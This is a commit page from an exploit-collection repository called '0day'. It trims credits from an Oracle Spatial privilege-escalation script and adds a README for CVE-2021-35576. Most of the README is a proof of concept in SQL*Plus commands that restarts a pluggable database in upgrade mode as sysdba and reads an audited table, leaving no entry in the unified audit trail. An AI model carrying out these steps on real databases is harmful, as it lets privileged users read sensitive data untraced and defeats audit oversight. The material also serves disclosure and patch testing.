admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add 2-Oracle Unified 审计策略绕过

Browse Source
This commit is contained in:
helloexp 2023-02-21 15:28:56 +08:00
parent 33b71388cd
commit febd9bf845
2 changed files with 49 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
27-Oracle/1-Oracle 数据库Spatial 组件提权/exp.sql
View File

@ -156,13 +156,4 @@ configure auditing to catch any privilege escalation attempts.
review database account permissions on regular basis. review database account permissions on regular basis.
ensure database accounts have strong passwords, and rotate passwords regularly if possible. ensure database accounts have strong passwords, and rotate passwords regularly if possible.
perform VA (vulnerability assesment) scans on regular basis. perform VA (vulnerability assesment) scans on regular basis.
pro-actively patch your systems and database systems. pro-actively patch your systems and database systems.
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/
Credit:
Security-In-Depth Contributors: Emad Al-Mousa

48
27-Oracle/2-Oracle Unified 审计策略绕过/README.md Normal file
View File

@ -0,0 +1,48 @@
### CVE
CVE-2021-35576
### 受影响版本
12.1.0.2, 12.2.0.1, 19c
### POC
```shell
Proof of Concept (PoC):
I will create a table in pluggable database PDB1 under HR schema and insert few records:
SQL> CREATE TABLE HR.EMPLOYEE
(
FIRST_NAME VARCHAR2(50),
LAST_NAME VARCHAR2(50)
);
SQL> INSERT INTO HR.EMPLOYEE (
FIRST_NAME, LAST_NAME)
VALUES ( 'EMAD','MOUSA' );
SQL> commit;
SQL> INSERT INTO HR.EMPLOYEE (
FIRST_NAME, LAST_NAME)
VALUES ( 'SAMI','MOUSA' );
SQL> commit;
I will now create audit policy:
SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;
SQL> audit policy SELECT_P1;
To check audit policies configured in PDB1 database:
SQL> SELECT * FROM audit_unified_enabled_policies;
Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:
sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> shutdown immediate;
SQL> startup upgrade;
SQL> select * from HR.EMPLOYEE;
SQL> startup force;
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;
Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:
SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=EMPLOYEE order by EVENT_TIMESTAMP desc;
So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !
```